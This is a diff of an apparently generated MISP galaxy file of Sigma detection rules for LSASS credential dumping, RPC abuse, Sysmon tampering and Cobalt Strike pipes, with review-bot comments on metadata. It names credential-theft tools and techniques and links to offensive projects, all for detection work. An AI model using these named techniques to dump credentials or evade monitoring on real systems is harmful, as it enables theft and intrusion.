@@ -2011,11 +2558,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ @@ -2038,14 +2584,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", "value": "Recon Activity via SASec" 
@@ -2063,16 +2610,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/tactics/TA0008/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1112/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ - "attack.lateral_movement" + "attack.lateral_movement", + "attack.t1112" ] }, "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", @@ -2091,11 +2637,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], "tags": [ 
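Review bot: In the `rpc_firewall_remote_registry_lateral_movement.yml` hunk `attack.t1112` is added as a tag beside `attack.lateral_movement`, while the `https://attack.mitre.org/techniques/T1112/` reference that explained it is removed and no `related` entry is generated. T1112 (Modify Registry) sits under defense evasion in ATT&CK, so the pairing with a lateral-movement tactic tag is at least surprising; that comes from the upstream rule, but with the reference gone a reader of the galaxy has nothing to reconcile the two. Either keep the ATT&CK references in `refs` (a harmless duplicate) or make sure every technique tag produces a `related` entry so the link survives.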
@@ -2118,14 +2663,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0007/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", "value": "Remote Schedule Task Recon via AtScv" @@ -2151,6 +2697,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "value": "Potential Credential Dumping Attempt Via PowerShell" }, 
@@ -2167,10 +2722,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], @@ -2180,6 +2735,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", "value": "LSASS Access from Program in Suspicious Folder" }, @@ -2196,8 +2760,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ @@ -2205,6 +2769,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", "value": "Lsass Memory Dump via Comsvcs DLL" }, 
@@ -2234,6 +2807,22 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", "value": "CMSTP Execution Process Access" }, @@ -2260,6 +2849,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", "value": "Load Undocumented Autoelevated COM Interface" }, @@ -2284,6 +2882,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "value": "Credential Dumping by Pypykatz" }, @@ -2300,8 +2907,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/hlldz/Invoke-Phant0m", + "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ @@ -2309,6 +2916,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "value": "Suspect Svchost Memory Asccess" }, 
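Review bot: The cluster `value` `"Suspect Svchost Memory Asccess"` in the last hunk on this line carries a typo copied verbatim from the upstream Sigma title, and `value` is what becomes the MISP tag name. Because this file is regenerated, correcting it here would be overwritten; fix it in upstream `proc_access_win_invoke_phantom.yml` and expect the tag name to change on the next regeneration while the `uuid` `166e9c50-8cd9-44af-815d-d1f0c0e90dde` stays stable. A generator-side check that `value` does not change for an existing `uuid` without a deliberate rename would catch such churn early.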
@@ -2325,9 +2941,9 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/mrd0x/status/1460597833917251595",
 "https://twitter.com/_xpn_/status/1491557187168178176",
 "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz",
- "https://twitter.com/mrd0x/status/1460597833917251595",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml"
 ],
 "tags": [
@@ -2336,6 +2952,15 @@
 "attack.s0002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651",
 "value": "LSASS Access from White-Listed Processes"
 },
@@ -2365,6 +2990,29 @@
 "attack.s0002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8",
 "value": "Mimikatz through Windows Remote Management"
 },
@@ -2391,6 +3039,15 @@
 "attack.s0002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7",
 "value": "WerFault Accassing LSASS"
 },
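Review bot: The new `related` arrays in hunks -2336, -2365 and -2391 carry only technique relationships, while the clusters' `tags` also list `attack.s0002` (and elsewhere `attack.s0349`, `attack.s0029`, `car.2019-04-001`, `car.2019-04-004`, `car.2016-04-002`), which get no relationship at all; if `related` is derived from the `attack.tXXXX` tags, that rule should be documented in the galaxy so consumers know software and CAR tags are deliberately left as plain tags and not treated as a missing link. Every entry is also tagged `"type": "related-to"` with `estimative-language:likelihood-probability="almost-certain"`, which is reasonable for a mechanical tag-to-UUID mapping, but a short note in the cluster description such as `"related entries are generated from the rule's ATT&CK technique tags; software and CAR tags are not resolved"` would make the provenance explicit. If the relationship vocabulary used by this galaxy offers a more specific type than `related-to` for a detection rule pointing at a technique, it would also state the direction of the link; I cannot confirm that from this hunk.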
@@ -2441,6 +3098,15 @@
 "attack.s0349"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0",
 "value": "Credential Dumping by LaZagne"
 },
@@ -2463,6 +3129,15 @@
 "attack.t1548"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "174afcfa-6e40-4ae9-af64-496546389294",
 "value": "SVCHOST Credential Dump"
 },
@@ -2488,6 +3163,15 @@
 "attack.t1548.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c",
 "value": "UAC Bypass Using WOW64 Logger DLL Hijack"
 },
@@ -2504,10 +3188,10 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md",
- "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html",
 "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md",
 "https://research.splunk.com/endpoint/windows_possible_credential_dumping/",
+ "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml"
 ],
 "tags": [
@@ -2516,6 +3200,15 @@
 "attack.s0002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da",
 "value": "LSASS Memory Dump"
 },
@@ -2532,9 +3225,9 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
 "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml"
 ],
@@ -2545,6 +3238,15 @@
 "car.2019-04-004"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d",
 "value": "Credential Dumping Tools Accessing LSASS Memory"
 },
@@ -2561,10 +3263,10 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
 "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
 "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
 "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml"
 ],
@@ -2574,6 +3276,15 @@
 "attack.s0002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65",
 "value": "Rare GrantedAccess Flags on LSASS Access"
 },
@@ -2590,10 +3301,10 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
 "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
 "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
 "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml"
 ],
@@ -2603,6 +3314,15 @@
 "attack.s0002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a18dd26b-6450-46de-8c91-9659150cf088",
 "value": "Suspicious GrantedAccess Flags on LSASS Access"
 },
@@ -2627,6 +3347,15 @@
 "attack.t1106"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0",
 "value": "Direct Syscall of NtOpenProcess"
 },
@@ -2654,6 +3383,40 @@
 "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da",
 "value": "Potential Shellcode Injection"
 },
+ {
+ "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2023/01/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_access_win_invoke_patchingapi.yml",
+ "level": "medium",
+ "logsource.category": "process_access",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/D1rkMtr/UnhookingPatch",
+ "https://twitter.com/D1rkMtr/status/1611471891193298944?s=20",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_patchingapi.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "b916cba1-b38a-42da-9223-17114d846fd6",
+ "value": "Potential NT API Stub Patching"
+ },
 {
 "description": "Detects the process injection of a LittleCorporal generated Maldoc.",
 "meta": {
@@ -2676,6 +3439,22 @@
 "attack.t1055.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac",
 "value": "LittleCorporal Generated Maldoc Injection"
 },
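Review bot: The new "Potential NT API Stub Patching" cluster in hunk -2654 writes `"creation_date": "2023/01/07"`, a slash-separated date rather than ISO 8601 (`"2023-01-07"`), so consumers that sort or compare clusters by date must special-case the format; this is presumably copied verbatim from the Sigma rule's `date` field, and the same convention likely applies to every other cluster in the file (their `creation_date` lines are outside this hunk). Either normalising to `YYYY-MM-DD` at generation time or documenting the format in the galaxy description would remove the ambiguity. The rest of the entry is consistent with its neighbours: `tags` is an array, the `related` mapping for `attack.t1562.002` matches the one used for "SysmonEnte Usage" in -2754, and the SigmaHQ rule link is last in `refs`.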
@@ -2702,6 +3481,22 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5",
 "value": "HandleKatz Duplicating LSASS Handle"
 },
@@ -2728,6 +3523,15 @@
 "attack.s0002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3",
 "value": "LSASS Memory Access by Tool Named Dump"
 },
@@ -2744,9 +3548,9 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png",
- "https://github.com/codewhitesec/SysmonEnte/",
 "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html",
+ "https://github.com/codewhitesec/SysmonEnte/",
+ "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml"
 ],
 "tags": [
@@ -2754,6 +3558,15 @@
 "attack.t1562.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e",
 "value": "SysmonEnte Usage"
 },
@@ -2781,6 +3594,15 @@
 "attack.t1562.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "09706624-b7f6-455d-9d02-adee024cee1d",
 "value": "CobaltStrike BOF Injection Pattern"
 },
@@ -2797,9 +3619,9 @@
 "logsource.category": "process_access",
 "logsource.product": "windows",
 "refs": [
+ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
 "https://twitter.com/SBousseaden/status/1541920424635912196",
 "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml",
- "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml"
 ],
 "tags": [
@@ -2807,6 +3629,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7",
 "value": "Suspicious LSASS Access Via MalSecLogon"
 },
@@ -2879,6 +3710,15 @@
 "attack.t1055.012"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd",
 "value": "Sysmon Process Hollowing Detection"
 },
@@ -2895,8 +3735,8 @@
 "logsource.category": "sysmon_error",
 "logsource.product": "windows",
 "refs": [
- "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml"
 ],
 "tags": [
@@ -2904,6 +3744,15 @@
 "attack.t1564"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8",
 "value": "Sysmon Configuration Error"
 },
@@ -2920,8 +3769,8 @@
 "logsource.category": "sysmon_status",
 "logsource.product": "windows",
 "refs": [
- "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml"
 ],
 "tags": [
@@ -2929,6 +3778,15 @@
 "attack.t1564"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744",
 "value": "Sysmon Configuration Modification"
 },
@@ -2945,8 +3803,8 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
 "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
+ "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml"
 ],
 "tags": [
@@ -2971,8 +3829,8 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
 "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
+ "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml"
 ],
 "tags": [
@@ -3008,6 +3866,36 @@
 "attack.t1003.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e",
